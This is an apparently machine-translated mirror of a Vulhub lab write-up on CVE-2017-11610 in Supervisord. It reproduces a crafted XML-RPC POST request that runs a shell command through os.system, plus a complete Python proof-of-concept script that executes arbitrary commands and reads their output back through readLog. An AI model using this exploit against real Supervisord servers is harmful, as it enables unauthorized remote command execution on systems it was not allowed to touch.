当前位置:网站首页>Vulhub vulnerability recurrence 67_ Supervisor

Vulhub vulnerability recurrence 67_ Supervisor

2022-07-06 05:16:00 Revenge_ scan

CVE-2017-11610_ Supervisord Remote command execution vulnerability

Preface

Supervisor(http://supervisord.org/) Yes, it is Python One developed client/server service , yes Linux/Unix A process management tool under the system , I won't support it Windows System . It's easy to monitor 、 start-up 、 stop it 、 Restart one or more processes .

Reference link :

- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html

- https://blogs.securiteam.com/index.php/archives/3348

-https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b

Vulnerability environment

shooting range :192.168.4.10_ubuntu

#docker-compose build

docker-compose up -d

After the environment starts , visit `http://your-ip:9001` You can view it Supervisord The page of .

 

Vulnerability testing

Execute arbitrary commands directly :

```

POST /RPC2 HTTP/1.1

Host: localhost

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 213

<?xml version="1.0"?>

<methodCall>

<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>

<params>

<param>

<string>touch /tmp/success</string>

</param>

</params>

</methodCall>

```

  Container view success Create success

## About direct echo POC

@Ricter An idea put forward on Weibo , Very effective , Is to write the result of the command execution to log In file , Call again Supervisord Self contained readLog Method reading log file , Read the results .

Write a simple POC: [poc.py](poc.py), Post it directly :

```python

#!/usr/bin/env python3

import xmlrpc.client

import sys

target = sys.argv[1]

command = sys.argv[2]

with xmlrpc.client.ServerProxy(target) as proxy:

    old = getattr(proxy, 'supervisor.readLog')(0,0)

    logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()

    getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))

    result = getattr(proxy, 'supervisor.readLog')(0,0)

    print(result[len(old):])

```

Use Python3 Execute and get the results :`./poc.py "http://your-ip:9001/RPC2" "command"`:

原网站

版权声明
本文为[Revenge_ scan]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202132119084702.html

边栏推荐

猜你喜欢

随机推荐